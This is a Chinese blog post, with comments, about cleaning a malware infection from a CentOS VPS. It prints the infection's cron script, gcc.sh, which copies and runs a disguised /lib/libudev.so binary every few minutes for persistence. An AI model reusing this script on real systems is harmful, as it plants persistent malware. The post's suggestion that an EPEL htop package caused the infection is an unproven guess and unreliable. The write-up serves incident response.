Centos居然中毒了!

好扯淡的嗦,今天登陆VPS想看看运行情况,使用Htop查看进程,突然发现很不正常,各种进程快速启动,然后关闭,并出现了ls -a、ifconfig、grep这类的系统进程,且ifconfig这个网络命令的cpu占用率一直保持在99%。第一反应,中毒了???

使用chkconfig --list查看,居然没有异常的东西!

chkconfig

查看crontab日志

gcc

我去,好夸张。。。3分钟执行一次。。。看看这玩意儿里面到底是啥子!!

[root@WebServer ~]# cat /etc/cron.hourly/gcc.sh
#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin
for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
cp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6

既然知道了,删除试试。。。重启后又出现!!!!!

使用top命令看看到底是哪个程序。结果一个rwvyraspcb的进程(我完全不记得有这样的进程)CPU占用率和之前htop里面看到的ifconfig占用的几乎一致,记下PID 1270。。kill -STOP 1270暂停程序试试。

使用lsof看看是否还有进程在打开,再看看最近的变动

既然没有多打开的进程,那么就找现有的删掉看看。

全部都干净了,干掉刚才停止的进程。

使用htop再看看进程列表。哦也!干净了!!

来吧,删除病毒本体

2015年12月27日更新
今天新配置环境,安装了epel源的htop发现这个病毒又出来!
直接安装杀毒软件!ClamAV

  1. kuhanzhu 2015.12.20 6:09pm

    我一VPS之前也中了这个病毒,删除了。不过不知道为什么会中。查不出。

    • Jalena 2015.12.22 10:46pm

      我反正也没找到来到底是怎么中毒的!

    • Jalena 2015.12.27 12:32am

      你是不是安装过Htop,我今天发现安装epel源的htop,病毒就出来了!

  2. John 2015.11.23 12:53pm

    Max 7

HTML tag cannot be used in this comment.